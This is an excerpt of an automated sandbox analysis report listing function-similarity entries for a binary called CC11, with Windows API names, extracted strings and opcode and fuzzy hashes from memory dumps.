                                                                                                                                                                  • Instruction Fuzzy Hash: 8041A321B1C643B1FBB1AB34E8556BA6261EF8878CF4444B2E64EC27DDEE3CE5458700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                  • String ID: P%
                                                                                                                                                                  • API String ID: 2147705588-2959514604
                                                                                                                                                                  • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                  • Instruction ID: 3d794453b29d6e52b5fef5efc14075ca947aac606ac034f791f3d8966fb337e9
                                                                                                                                                                  • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A510726604BA186D6349F36E4185BAB7A2FB98B65F004131EFDE83789DF3CD085CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: -$:$f$p$p
                                                                                                                                                                  • API String ID: 3215553584-2013873522
                                                                                                                                                                  • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                  • Instruction ID: d53f21e28c4a279cb3c742a414f6095389497467c83ee6494f19ca4f6eeb2d2e
                                                                                                                                                                  • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A129061E0C243A6FB319A3DE0542797691FB40752F944176E689C7BCCEF3CE9828B08
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: f$f$p$p$f
                                                                                                                                                                  • API String ID: 3215553584-1325933183
                                                                                                                                                                  • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                  • Instruction ID: 0a7f252f09a8ebe5459d82713e5bfd62826b94b451eaf8231740437f5ab60462
                                                                                                                                                                  • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                  • Instruction Fuzzy Hash: E312A572E0C343A6FB309A28E05477A7251FB80754F844076E69A877CEDF7CE5A68B50
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                  • Opcode ID: c399ccfa1615de4e39718b025a1b3854e197f509e99eee99eeb70b724fa35d24
                                                                                                                                                                  • Instruction ID: 4ff96e2b5d55b41244753c365462c7c41f58a6b64fbfac0f938fdf32817bb11c
                                                                                                                                                                  • Opcode Fuzzy Hash: c399ccfa1615de4e39718b025a1b3854e197f509e99eee99eeb70b724fa35d24
                                                                                                                                                                  • Instruction Fuzzy Hash: A6417E21B0864272EA759B36A8406FAA3A5FF44BCCF544071EE4D87B9DEE3CE5458700
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message
                                                                                                                                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                  • API String ID: 2030045667-3659356012
                                                                                                                                                                  • Opcode ID: 9c62d6094ca81ecf2617bb82d10b75015b4188cea332ec045593c4b2de59fb31
                                                                                                                                                                  • Instruction ID: 4b6a3f4181b1ff05e52e113272ff9a4d96ae6244df6e8967a3e72cd431b6587c
                                                                                                                                                                  • Opcode Fuzzy Hash: 9c62d6094ca81ecf2617bb82d10b75015b4188cea332ec045593c4b2de59fb31
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B419221B08A43A2EB759B35A4405FA63A5FF48BDCF544071EE4D87B9DEE3CE5418700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                  • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                  • Instruction ID: 7b7fc0d14f23e5e8cbccf311bdbe500c2db0c24baa8cb43b77b5408f9667c13a
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                  • Instruction Fuzzy Hash: 85D18032A08781A6EBB09B75D4403AD7BA4FB5978CF100176EE4D97B9ADF38E491C740
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D06D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D07B
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D0A5
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D113
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF69001D29A,?,?,?,00007FF69001CF8C,?,?,?,00007FF69001CB89), ref: 00007FF69001D11F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                  • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                  • Instruction ID: c14b94142e2d950d534a811ae49820a420fbbe260568b69c40cb5573b4195e73
                                                                                                                                                                  • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                  • Instruction Fuzzy Hash: 8531B421A1AA42A1EE77DB66A4007752395FF0CBA8F590576EE1D87388EF7CE4428700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                  • Opcode ID: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                  • Instruction ID: 19388cbea8efa2374654c0aacefefa60c5212b1b5965c82967659b45a91bd2f7
                                                                                                                                                                  • Opcode Fuzzy Hash: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                  • Instruction Fuzzy Hash: 73215E20B4C682A2FA78A339565957D6182EF897B0F1447B4E93EC7BDEDE6CF4024701
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                  • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                  • Instruction ID: 6f4386c37402aa6db2f2534a31a9692c62b08002f2a30eec1ce04c0af795c285
                                                                                                                                                                  • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                  • Instruction Fuzzy Hash: C811D321B18A4196E3718B22E85472976A1FB9CBE4F400274EA1DC3798DF3CD400C744
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001821D
                                                                                                                                                                  • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001827A
                                                                                                                                                                    • Part of subcall function 00007FF6900186B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF690013FA4,00000000,00007FF690011925), ref: 00007FF6900186E9
                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018305
                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018364
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF690018375
                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF6900139F2), ref: 00007FF69001838A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3462794448-0
                                                                                                                                                                  • Opcode ID: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                                                                                                                  • Instruction ID: 68c38ac7e61ed035dd068d7db7e4c83419e214784005ea1dbc459c319fa64fd5
                                                                                                                                                                  • Opcode Fuzzy Hash: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                                                                                                                  • Instruction Fuzzy Hash: B4418162A1968291EAB09B32A5412BA7394FF85FC8F484175DFAD9778DDF3CE601C700
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A5E7
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A61D
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A64A
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A65B
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A66C
                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF6900243FD,?,?,?,?,00007FF69002979A,?,?,?,?,00007FF69002649F), ref: 00007FF69002A687
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                  • Opcode ID: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                  • Instruction ID: 1712ff77c2c2f812952db0169e82a01ca582ab220fab28333c2db2069312884c
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                  • Instruction Fuzzy Hash: F8114D20F4C282A2FA74A7395A4917D6682EF497B4F5847B4E93E877DEDE2CF4024701
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                  • String ID: Unhandled exception in script
                                                                                                                                                                  • API String ID: 3081866767-2699770090
                                                                                                                                                                  • Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                  • Instruction ID: 9718d0a7aaf3402a58deb879cf80911b94a83efd374cba32a11739075128efa2
                                                                                                                                                                  • Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                                                                                                  • Instruction Fuzzy Hash: 15314A26A08A8299EB20EB75E8556F963A1FF88788F440175EA4D87B99DF3CD101C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                  • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                  • API String ID: 1878133881-640379615
                                                                                                                                                                  • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                  • Instruction ID: aafc1661d88d4142d1711722eb9821fdca361f80a0f20994158c0d283fc6799f
                                                                                                                                                                  • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C216072628A86A1E670DB20F4517EA6364FF88788F401176EB8C93B9DDF7CD645CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                  • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                  • Instruction ID: 751bbea9ba38823744a614e30e1e809dc607d79709df8e5bfa44484fecd930ba
                                                                                                                                                                  • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0C225B09702A1EA308B34E4457392320EF59765F940675DA6E863F8DF2CD149C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                  • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                  • Instruction ID: e724984797730fa90e32db63e4073420c7ed40392377d907ada1700d91663afc
                                                                                                                                                                  • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
